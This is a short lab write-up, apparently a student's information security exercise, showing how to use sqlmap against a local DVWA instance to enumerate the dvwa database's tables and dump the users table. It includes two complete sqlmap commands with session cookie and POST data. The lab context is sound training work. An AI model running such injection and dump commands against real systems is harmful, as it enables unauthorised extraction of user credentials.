NMCuonG08/InformationSecurity-Lab-Chapter-2/lab.md

 ![image](https://github.com/user-attachments/assets/0a9fd479-4d89-43ba-9f3a-56db673d3400)

+Return 2 available databases named : dvwa and information_schema

 **Question 2**: Use sqlmap to get tables, users information **Answer 2**:

 ## 1. Choice Database is dvwa and Use sqlmap to get table

+-D: This option specifies the database name that sqlmap should target.
+--tables:
+This option tells sqlmap to enumerate the tables within the specified database (in this case, dvwa).
+If the dvwa database is found and accessible, sqlmap will retrieve and display a list of its tables.

 ```bash
 sqlmap -u "http://localhost:8080/vulnerabilities/sqli" --cookie="PHPSESSID=8i0tfhbnhtb8oe03hmukldr8n3; security=medium " --data="id=1&Submit=Submit" --batch -D dvwa --tables
 ```

 ![image](https://github.com/user-attachments/assets/13a09125-e859-4705-8e9c-50f30622f3be)

+Return 2 tables named : guestbook and users

 ## 2. Choice Database is Users and  use sqlmap to get  users information

+-T: Specifies the target table to operate on.
+--dump:
+This option tells sqlmap to extract and display the contents of the specified table (users).
+It retrieves all rows and columns from the users table

 ```bash
 sqlmap -u "http://localhost:8080/vulnerabilities/sqli" --cookie="PHPSESSID=8i0tfhbnhtb8oe03hmukldr8n3; security=medium " --data="id=1&Submit=Submit" --batch -D dvwa -T users --dump
 ```

+Retrun all columns and all row of table named users

 ![image](https://github.com/user-attachments/assets/70f0eef2-adaa-4242-b3d2-279322f1da2b)